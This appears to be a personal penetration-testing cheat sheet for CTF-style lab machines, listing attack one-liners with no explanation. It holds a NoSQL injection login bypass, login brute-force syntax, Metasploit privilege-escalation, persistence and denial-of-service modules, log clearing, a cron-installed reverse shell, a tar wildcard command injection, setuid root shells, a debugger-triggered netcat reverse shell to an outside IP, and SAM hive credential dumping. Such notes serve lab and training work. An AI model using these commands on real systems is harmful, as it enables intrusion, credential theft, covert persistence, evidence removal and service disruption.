export TERM=xterm
export TERM=xterm-256color
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg
stty rows 200
stty cols 200
89 50 4E 47 0D 0A 1A 0A
export PATH=/tmp:$PATH
{"email": {"$ne": ""}, "password": {"$ne": ""}}
gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --url http://pirate.htb/ --append-domain
http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong" 

sc.exe create <new_service_name> binPath="C:\windows\temp\evil.ps1" start=auto

	redis-cli -h 10.201.90.207      (responder ə cavab gəlsin deyə)
	eval "dofile('//10.14.97.140/test')" 0

exploit/linux/local/abrt_raceabrt_priv_esc
use exploit/linux/local/pkexec
exploit/windows/local/service_permissions
exploit/windows/local/bypassuac
post/multi/recon/local_exploit_suggester

post/multi/manage/autoroute

post/linux/manage/cron_persistence
post/windows/manage/persistence
clearev

auxiliary/dos/http/slowloris
auxiliary/dos/windows/smb/ms17_010_psexec_dos
auxiliary/dos/windows/ftp/3com_ftp_server

sudo -u victim /home/victim/shell.elf &
echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4445 0>&1'" | sudo crontab -u victim -

sudo -u#-1 /bin/bash

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

echo "chmod +s /bin/bash" > vusal.sh
echo "" > "--checkpoint-action=exec=sh vusal.sh"
echo "" > --checkpoint=1

jdb -attach 127.0.0.1:18001
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
print new java.lang.Runtime().exec("nc 10.14.97.140 9001 -e /bin/bash")

reg.exe save hklm\system SYSTEM
reg.exe save hklm\sam SAM
impacket-secretdumps -sam SAM -system SYSTEM local
